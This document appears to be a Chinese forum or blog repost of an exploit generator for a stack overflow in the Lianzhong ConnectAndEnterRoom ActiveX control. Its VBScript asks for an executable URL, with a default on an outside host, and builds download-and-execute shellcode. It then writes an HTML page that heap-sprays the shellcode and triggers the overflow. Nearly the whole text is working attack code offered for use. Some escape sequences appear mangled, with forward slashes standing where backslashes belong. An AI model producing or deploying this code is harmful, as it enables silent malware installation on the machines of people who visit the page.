联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp) 's

鬼仔注：又见联众来源：vbs空间exeurl = InputBox( "请输入下载执行exe的地址：", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="/xe9/xf3/x00/x00/x00/x90/x90/x90/x90/x5a/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x40/x08/x8b/xd8/x8b/x73/x3c/x8b/x74/x1e/x78/x03/xf3/x8 b/x7e/x20/x03/xfb/x8b/x4e/x14/x33/xed/x56/x57/x51/x8b/x3f/x03/xfb/x8b/xf2/x6a/x0e/x59/xf3/xa6/x74/x08/x59/x5f/x83/xc7/x04/x45/xe2/xe9/x59/x5f/x5e/x8b/xcd/x8b/x46/x24/x03/xc3/xd1/xe1/x03/xc1/x33/xc9/x66/x8b/x08/x8b/x46/x1c/x03/xc3/xc1/xe1/x02/x03/xc1/x8b/x00/x03/xc3/x8b/xfa/x8b/xf7/x83/xc6/x0e/x8b/xd0/x6a/x04/x59/xe8/x6a/x00/x00/x00/x83/xc6/x0d/x52/x56/xff/x57/xfc/x5a/x8b/xd8/x6a/x01/x59/xe8/x57/x00/x00/x00/x83/xc6/x13/x56/x46/x80/x3e/x80/x75/xfa/x80/x36/x80/x5e/x83/xec/x40/x8b/xdc/xc7/x03/x63/x6d/x64/x20/x43/x43/x43/x43/x66/xc7/x03/x2f/x63/x43/x43/xc6/x03/x20/x43/x6a/x20/x53/xff/x57/xec/xc7/x04/x03/x5c/x61/x2e/x65/xc7/x44/x03/x04/x78/x65/x00/x00/x33/xc0/x50/x50/x53/x56/x50/xff/x57/xfc/x8b/xdc/x6a/x00/x53/xff/x57/xf0/x68/x51/x24/x40/x00/x58/xff/xd0/x33/xc0/xac/x85/xc0/x75/xf9/x51/x52/x56/x53/xff/xd2/x5a/x59/xab/xe2/xee/x33/xc0/xc3/xe8/x0c/xff/xff/xff/x47/x65/x74/x50/x72/x6f/x63/x41/x64/x64/x72/x65/x73/x73/x00/x47/x65/x74/x53/x79/x73/x74/x65/x6d/x44/x69/x72/x65/x63/x74/x6f/x72/x79/x41/x00/x57/x69/x6e/x45/x78/x65/x63/x00/x45/x78/x69/x74/x54/x68/x72/x65/x61/x64/x00/x4c/x6f/x61/x64/x4c/x69/x62/x72/x61/x72/x79/x41/x00/x75/x72/x6c/x6d/x6f/x6e/x00/x55/x52/x4c/x44/x6f/x77/x6e/x6c/x6f/x61/x64/x54/x6f/x46/x69/x6c/x65/x41/x00"&Unicode(exeurl&Chr(00)&Chr(00))
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "/x" & temp
Next
Unicode = str
End Function
function replaceregex(str)
set regex=new regExp
regex.pattern="//x(..)//x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)
fileS.writeline "<html>"
fileS.writeline "<object classid=""clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69"" id='target'></object>"
fileS.writeline "<body>"
fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"
fileS.writeline "var headersize = 20;"
fileS.writeline "var slackspace = headersize+shellcode.length;"
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
fileS.writeline "var buffer = '';"
fileS.writeline "while (buffer.length < 164) buffer+=""A"";"
fileS.writeline "buffer=buffer+""/x0a/x0a/x0a/x0a""+buffer;"
fileS.writeline "ok=""ok"";"
fileS.writeline "target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );"
fileS.writeline "</script>"
fileS.writeline "</body>"
fileS.writeline "</html>"files.Close
Set fso=nothing
msgbox "生成完毕!"
end if